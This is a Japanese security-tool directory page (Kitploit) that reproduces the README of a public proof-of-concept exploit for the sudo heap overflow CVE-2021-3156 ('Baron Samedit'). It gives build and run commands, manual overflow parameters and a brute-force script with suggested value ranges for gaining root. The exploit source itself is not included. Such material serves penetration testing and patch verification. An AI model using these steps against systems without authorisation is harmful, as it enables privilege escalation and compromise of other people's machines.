Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-3156 | Kitploit
ツール/GitHubGitHub/oneoy/cve-2021-3156
特権昇格脆弱性分析エクスプロイトペネトレーションテストレッドチーミングバイナリエクスプロイト
GitHuboneoy/cve-2021-3156

CVE-2021-3156

リポジトリを見る
25年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-3156 PoC

はじめに

これは、Qualys によって Baron Samedit と名付けられた CVE-2021-3156 sudo 脆弱性に対するエクスプロイトです。

使用方法

ビルド:

root@kitploit:~
$ make

ターゲット一覧:

root@kitploit:~
$ ./sudo-hax-me-a-sandwich

実行:

root@kitploit:~
$ ./sudo-hax-me-a-sandwich <target_number>

手動モード:

root@kitploit:~
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>

ターゲット探索のブルートフォース (試験的)

GNU parallel がインストールされていることを確認してください。

root@kitploit:~
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>

試すべきデフォルト値の例:

root@kitploit:~
$ ./brute.sh 90 120 50 70 150 300

利用可能なすべてのコアを消費します。Netflix を見ながらのブルートフォースはやめておきましょう。

コントリビューション

(妥当な) PR を送ってください。マージするかもしれません。

いくつかのアイデア:

  • より多くのターゲット
  • ターゲット探索
  • その他のエクスプロイト戦略
  • より自己完結的な機能:
    • 共有ライブラリ hax.c を埋め込む (小さくしてください。ELF golf + asm setuid/execve スタブ)
    • hax.c に mkdir ロジックを追加
  • ディレクトリ/共有ライブラリのクリーンアップ
ツールをダウンロード